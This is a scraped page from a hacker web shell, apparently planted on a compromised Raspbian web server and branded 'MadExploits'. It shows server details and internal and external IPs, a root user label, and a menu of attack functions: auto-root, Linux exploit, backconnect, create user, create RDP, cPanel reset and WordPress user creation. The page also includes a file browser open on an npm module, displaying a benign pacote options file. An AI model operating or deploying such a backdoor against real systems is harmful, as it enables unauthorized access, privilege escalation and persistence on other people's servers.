Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
pacote /
lib /
util /
[ HOME SHELL ]
Name
Size
Permission
Action
cache-key.js
129
B
-rw-r--r--
git.js
6.95
KB
-rw-r--r--
opt-check.js
1.85
KB
-rw-r--r--
pack-dir.js
1.02
KB
-rw-r--r--
silentlog.js
186
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : opt-check.js
'use strict' const pkg = require('../../package.json') const silentlog = require('./silentlog') function PacoteOptions (opts) { opts = opts || {} this._isPacoteOptions = true this.agent = opts.agent this.annotate = opts.annotate this.auth = opts.auth this.scopeTargets = opts.scopeTargets || {} this.defaultTag = opts.defaultTag || 'latest' this.cache = opts.cache this.ca = opts.ca this.cert = opts.cert this.integrity = opts.integrity this.key = opts.key this.localAddress = opts.localAddress this.log = opts.log || silentlog this.memoize = opts.memoize this.maxSockets = opts.maxSockets || 10 this.offline = opts.offline this.preferOffline = opts.preferOffline this.proxy = opts.proxy this.noProxy = opts.noProxy this.registry = opts.registry || 'https://registry.npmjs.org' this.resolved = opts.resolved this.retry = opts.retry // for npm-registry-client this.scope = opts.scope this.userAgent = opts.userAgent || `${pkg.name}@${pkg.version}/node@${process.version}+${process.arch} (${process.platform})` this.where = opts.where this.preferOnline = opts.preferOnline this.strictSSL = !!opts.strictSSL this.isFromCI = !!( opts.isFromCI || process.env['CI'] === 'true' || process.env['TDDIUM'] || process.env['JENKINS_URL'] || process.env['bamboo.buildKey'] ) this.npmSession = opts.npmSession this.refer = opts.referer || opts.refer this.projectScope = opts.projectScope this.fullMetadata = opts.fullMetadata this.alwaysAuth = opts.alwaysAuth this.includeDeprecated = opts.includeDeprecated == null ? true : opts.includeDeprecated this.dirPacker = opts.dirPacker || null this.uid = opts.uid this.gid = opts.gid this.dmode = opts.dmode this.fmode = opts.fmode this.umask = opts.umask } module.exports = optCheck function optCheck (opts) { return new PacoteOptions(opts) }
Close